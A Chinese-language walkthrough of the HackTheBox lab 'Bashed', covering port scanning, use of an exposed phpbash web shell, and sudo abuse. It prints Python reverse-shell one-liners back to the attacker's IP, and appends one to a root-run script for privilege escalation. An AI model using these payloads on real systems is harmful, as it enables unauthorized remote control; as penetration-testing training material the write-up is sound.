靶机信息
靶机地址:
https://app.hackthebox.com/machines/Bashed
靶场: HackTheBox.com
靶机名称:Bashed
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Kali 10.10.16.4
靶机:10.10.10.68
信息收集
扫描端口
扫描靶机开放的服务端口
sudo nmap -p- 10.10.10.68
sudo nmap -sC -sV -A -p80 10.10.10.68 -oN nmap.log
扫描后发现只开放了80端口,先访问看看
http://10.10.10.68/
访问后发现程序中有phpbash说明,看来这个站点跟phpbash有关,试试这几个目录下面有没能phpbash.php文件
curl http://10.10.10.68/uploads/phpbash.php
curl http://10.10.10.68/dev/phpbash.php
漏洞利用(Exploitation)
dev目录下发现phpbash.php,用浏览器来访问
http://10.10.10.68/dev/phpbash.php
访问成功,来找找敏感信息
sudo -l
执行sudo -l后发现允许使用scriptmanager权限执行任何命令不需要密码,反弹个shell把scriptmanager权限发到攻击机上
1。攻击机监听4444端口
nc -lvnp 4444
2。执行反弹payload
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
拿到scriptmanager用户权限,再来找找敏感信息
cd /home/arrexel
cat user.txt
在arrexel用户目录下发现user.txt,再找找可提权的信息
cd
ls -al
权限提升(Privilege Escalation)
根目录下发现scripts文件夹,进入文件夹后发现test.py脚本和test.txt文本文件,看日期文件是刚刚生成的,先来看看test.py脚本内容
cat test.py
脚本内容为打开test.txt文件,写入内容,关闭文件,看test.txt文件权限为root,说明后台是root权限在运行test.py脚本
在脚本中插入反弹shell,当脚本以root权限运行时就会反弹个root权限的shell到攻击机上。
1。攻击机监听3333端口
nc -lvvp 3333
2。脚本中插入反弹payload
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' >>test.py
脚本写入后几秒钟shell便反弹回来,现在拿到了root权限,来找第2个flag。
cat /root/root.txt
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论